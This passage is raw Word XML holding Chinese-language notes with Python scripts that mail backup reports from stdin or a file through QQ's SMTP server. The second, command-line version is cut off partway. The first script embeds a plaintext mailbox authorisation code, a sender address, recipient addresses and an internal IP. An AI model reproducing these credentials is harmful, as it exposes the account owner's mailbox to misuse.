    <w:p w14:paraId="0E3B145D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B88E4DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0CB27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    send_mail()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083E5AFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="_Toc159780004"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有群发、设置发件人收件人的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:p w14:paraId="5B35116B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEA2597" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB0E507" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F08D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0613355E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import fileinput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F30408" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE792D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AB9E1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import smtplib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDDEF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.text import MIMEText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF32BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.image import MIMEImage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309B542" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.multipart import MIMEMultipart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767B547A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.application import MIMEApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7464D2AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.utils import parseaddr, formataddr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2B7D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C82DB11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def _format_addr(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331AE49B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    addr = parseaddr(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0E873" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return formataddr(addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A24AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35228846" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def send_mail():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2B528" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # [</w:t>
      </w:r>
      <w:r>
        <w:t>配置邮件配置</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167C7D33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>发送方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DBD3CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fromaddr = '2409879947@qq.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C599493" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    password = 'eamsmmphtspmebjb'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A5A638" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>接收方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E66B84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    toaddrs = ['shenyanjian@blingsec.cn', "xiaowenjie@blingsec.cn"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B77122" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # [</w:t>
      </w:r>
      <w:r>
        <w:t>发信内容</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367BF873" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>附件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7181D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    stdin = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E64DD30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    with fileinput.input(openhook=fileinput.hook_encoded(encoding='gbk')) as f_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E864D4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for line in f_input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150A57E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            stdin += line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE9ABCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    resApart = MIMEApplication(stdin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18703622" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    resApart.add_header('Content-Disposition', 'attachment', filename="report.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D97059" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>正文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7D06F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    content = "</w:t>
      </w:r>
      <w:r>
        <w:t>【完整报告见附件】</w:t>
      </w:r>
      <w:r>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>备份数据查看</w:t>
      </w:r>
      <w:r>
        <w:t>FTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:t>\n"+stdin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C424D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    textApart = MIMEText(content, 'plain', 'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC52E62" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m = MIMEMultipart()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239131E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m.attach(textApart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14335B22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    m.attach(resApart)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113BEB64" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C20C1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m['Subject'] = 'sca</w:t>
      </w:r>
      <w:r>
        <w:t>全量备份结果告知</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>月更</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29574B2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>自定义发件人</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EB5E8E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # m['From'] = _format_addr(fromaddr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24972E53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    m['From'] = "syj@192.168.3.199 "+fromaddr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8FD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ## </w:t>
      </w:r>
      <w:r>
        <w:t>自定义收件人</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>不定义会显示</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>收件人未填写</w:t>
      </w:r>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D858915" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for item in toaddrs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E8D4CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        m['to'] = _format_addr(item)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D38A513" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51219342" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:t>邮件行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101B1E26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60631B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server = smtplib.SMTP_SSL('smtp.qq.com', 465)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC6F1B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.login(fromaddr, password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3359A2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.sendmail(fromaddr, toaddrs, m.as_string())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02947C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('success')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210743D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        server.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC1A2FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    except smtplib.SMTPException as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55967344" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        print('error:', e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0C9C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FD8A09D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6496AD61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    send_mail()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0386564E" w14:textId="6B1924F3" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6447CC90" w14:textId="6A1E6499" w:rsidR="00822A09" w:rsidRDefault="00822A09" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="572" w:name="_Toc159780005"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我重新修改后的可以命令行传参的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="572"/>
    </w:p>
    <w:p w14:paraId="2B063ECA" w14:textId="77777777" w:rsidR="00822A09" w:rsidRPr="00822A09" w:rsidRDefault="00822A09" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0DEF04" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37973B34" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC7100F" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BFE4F1" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># import fileinput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BED50F" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02005C52" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E26E48" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import smtplib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ADBEB7" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.text import MIMEText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A34F1" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.image import MIMEImage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4DDFCF" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.multipart import MIMEMultipart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FF55F" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.mime.application import MIMEApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C50A03" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from email.utils import parseaddr, formataddr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E0063" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4101B400" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def _format_addr(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79633C43" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    addr = parseaddr(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BD57E" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return formataddr(addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A260E" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0462B47E" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>def send_mail():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2EB3D" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理命令行传参</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF7561B" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parser = argparse.ArgumentParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF2693" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parser.add_argument("-s", "--send", help="whom send to.use `,`to split\nEg: -s shenyanjian@gmail.com,gaopeng@gmail.com,laing@bl.cn")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706783EE" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parser.add_argument("-c", "--content", help="Content+stdin.\nEg:--content scaBackupMonthly")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3D39F2" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parser.add_argument("-sub", "--subject", help="Subject\nEg:--subject scaFullBackupMonthly")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE4D5C1" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parser.add_argument("-in", "--stdin", help="choose a file to send as an attachment.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9029C" w14:textId="77777777" w:rsidR="005D4D19" w:rsidRDefault="005D4D19" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
